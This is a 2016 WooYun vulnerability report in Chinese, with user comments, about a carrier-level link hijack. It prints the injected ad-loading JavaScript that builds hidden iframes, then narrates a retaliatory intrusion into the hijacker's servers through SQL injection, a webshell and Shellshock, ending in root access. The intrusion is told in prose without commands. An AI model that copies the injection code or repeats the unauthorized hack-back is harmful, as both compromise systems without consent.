一次对链路劫持的反击

编号228047
Urlhttp://www.wooyun.org/bug.php?action=view&id=228047
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题一次对链路劫持的反击
漏洞类型成功的入侵事件
厂商互联网应急响应中心
白帽子路人甲
提交日期2016-07-12 10:28:00
公开日期2016-07-17 10:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
起因是几个月前访问乌云和http网站时候网页播放蜜汁声音.当时还是dns劫持比较明显直接改dns就行,最近发现升级成为了链路劫持了,只能拔vpn过日子了.
这次懂得了广域网不用ssl已经不安全了.由衷的希望乌云可以上ssl... 如果分析有错希望大家多多包涵.感谢基友的帮忙..
最后多说一句劫持就算了吧 服务器做这么水 是要送肉鸡给鸡阔吗?
http://www.freebuf.com/vuls/62561.html
http://drops.wooyun.org/tips/11682
http://baike.baidu.com/link?url=_0eYS80EQMjttCrMOTKi6EwzymEAVgStJ9DkEWpHsNevMcPVv2xK4gjaeDzAiq8jfWdLfEaLn6uvqPuHCSD5CK
漏洞细节

首先先看看先抓包看看

QQ截图20160711152436.jpg


发现百度统计的**.**.**.**的返回包有问题
**.**.**.**:8080/tt/1.js
/tt/1.js

var CUSTOM_LOADJS={support:document.dispatchEvent?"onload":"onreadystatechange",query:{},module:{},add:function(e,t,n){var r=this.module;if(r[e])throw e+" is being";r[e]={},r[e].url=t,r[e].isOkay=n||!1},use:function(e,t){var n={},r;n.namespaces=e.split(","),n.callback=t||function(){},**.**.**.**plet=0,n.total=n.namespaces.length,r=n.namespaces.join(""),this.query[r]=n,this.start(n,r)},start:function(e,t){var n=0,r=e.namespaces.length,i,s;for(n;n<r;n++){s=e.namespaces[n].replace(/^\s+|\s+$/g,""),i=this.module[s];if(i===undefined)throw s+" is undefined";i.isOkay===!1?(i.isOkay=1,this.load(i.url,s,t)):i.isOkay===!0?this.checkBack(s,t):this.wait(i,s,t)}},wait:function(e,t,n){var r=this,i=setInterval(function(){e.isOkay===!0&&(clearInterval(i),r.checkBack(t,n))},500)},checkBack:function(e,t){this.module[e].isOkay=!0;var n=this.query[t];++**.**.**.**plet===n.total&&(n.callback(),delete this.query[t])},load:function(e,t,n){var r=this,i=document.createElement("script");i[this.support]=function(){/undefined|loaded|complete/.test(i.readyState)&&r.checkBack(t,n)},i.setAttribute("type","text/javascript"),i.setAttribute("src",e),document.getElementsByTagName("head")[0].appendChild(i)}}
CUSTOM_LOADJS.add('customadjs', '**.**.**.**:8080/1.js');CUSTOM_LOADJS.use('customadjs', function(){});


1.js

~function(){
try{
if(window.location.href.indexOf('**.**.**.**') == -1 && window.location.href.indexOf('**.**.**.**') == -1){
load_page('http://**.**.**.**/js/bbk365_ad_ext.html');
load_page('http://**.**.**.**/ad/ggj_51yrj.html');
load_page('http://**.**.**.**/ad/ggj_kea1688.html');
load_page('http://**.**.**.**/js/bbk365_ad.html');
}
}catch(ee){}
}();
function load_page(url){
try {
var x_ifr = '<div>'
+ ' <iframe style="display:none" src="'+url+'"></iframe>'
+ '</div>';
var x = document.createElement('div');
x.style.cssText="display:none;";
x.innerHTML=x_ifr;
document.body.appendChild(x);
} catch (e) {
}
}


1.js里面的

function load_page(url){
try {
var x_ifr = '<div>'
+ ' <iframe style="display:none" src="'+url+'"></iframe>'
+ '</div>';
var x = document.createElement('div');
x.style.cssText="display:none;";
x.innerHTML=x_ifr;
document.body.appendChild(x);
} catch (e) {
}
}


QQ截图20160711153032.jpg


http://**.**.**.**/js/bbk365_ad_ext.html
http://**.**.**.**/ad/ggj_51yrj.html
http://**.**.**.**/ad/ggj_kea1688.html
http://**.**.**.**/js/bbk365_ad.html
先查查域名信息吧,发现大多数都有域名信息保护

QQ截图20160711153634.jpg


然后叫机油用大数据找了一下发现这个邮箱是目标的常用邮箱之一于是找到了QQ

QQ截图20160711153821.jpg


QQ截图20160711153927.jpg


然后用Wireshark 确定一下是哪一跳出问题了.
可以看到有两个相同的包有一个被抛弃了

QQ截图20160711154404.jpg


QQ截图20160711155016.jpg


不可能在同一个地方跳两次呀有点可疑啊.
假设乌云的ttl值为64

QQ截图20160711155227.jpg


经过了9个路由应该是55呀 但是他是52 可以推测是第2-4附近的问题
可以得出**.**.**.**就是被劫持的路由器
然后对js调用的网站进行了渗透
http://**.**.**.**/存在一处注入
得到了数据库的root密码和ftp的密码

QQ截图20160711160156.jpg


然后发现是用lnmp搭建的悲催的是发现mysql被降权了,但是是站库分离 说不定数据库开放了ftp
于是对c段进行了扫描

QQ截图20160711160631.jpg


过程就是上传了一句话发现Disable_functions了然后用CVE-2014-6271 破壳漏洞搞定最后提权到root

QQ截图20160711161045.jpg


然后在数据库中找到了各种cms的密码进行getshell

QQ截图20160711161655.jpg


QQ截图20160711161709.jpg


QQ截图20160711161739.jpg


还有各种广告推广什么的 毕竟不懂他们盈利的方式
访问量

QQ截图20160711161045.jpg


大致准确吧

QQ截图20160711162232.jpg


QQ截图20160711162355.jpg


QQ截图20160711162650.jpg

POC

劫持的链接有这么一个域名

QQ截图20160711163257.jpg


QQ截图20160711163350.jpg


发现这个规模不大的公司在做这个 毕竟我不是运营商圈内人士,加上重庆联通这边宽带是外包的就比较复杂 到底是哪个环节出了问题还请jc叔叔们去找了.这样劫持如果被其他黑阔搞下找个0day挂几天分分钟感染一大堆啊...

修复方案

劫持就算了吧 服务器做这么水 是要送肉鸡给鸡阔吗?

状态信息 2016-07-12: 细节已通知厂商并且等待厂商处理中
2016-07-12: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-17: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-07-17 10:30
Showing 1-18 of 18 items.
评论内容评论人点赞数评论时间

这个也管不到人家的事啊,这种东西应该去通知谁?

Dusk02016-07-17 10:57:00

危害等级:无影响厂商忽略

atiger7702016-07-17 10:37:00

好想看啊!!!!!!

SoulHunter02016-07-12 16:31:00

666,目测劫持服务器有shellshock,被楼主日了?

f4ckbaidu02016-07-12 15:36:00

6666

skytws02016-07-12 14:58:00

ccav密切关注

老实先生02016-07-12 14:44:00

NB!

秋风02016-07-12 13:46:00

@term 0.0

heoo02016-07-12 13:11:00

@heoo 就是这个逼装的 雷都看不下去了 要劈死洞主

term02016-07-12 13:09:00

什么宽带?长城宽带?鹏博士?

BurpSuite02016-07-12 13:06:00

mark。

路飞02016-07-12 13:01:00

打雷是什么意思,求科普

heoo02016-07-12 12:53:00

听说霹雷了。

无名02016-07-12 12:50:00

卖瓜子,卖爆米花,来来来了啊,让一让!

DataSource02016-07-12 12:23:00

版权声明:转载请注明来源 路人甲@乌云

带头大哥02016-07-12 12:14:00

打雷了

骸骸02016-07-12 12:13:00

狭路相逢路人甲胜

Raven02016-07-12 10:55:00

前排

adamyi02016-07-12 10:35:00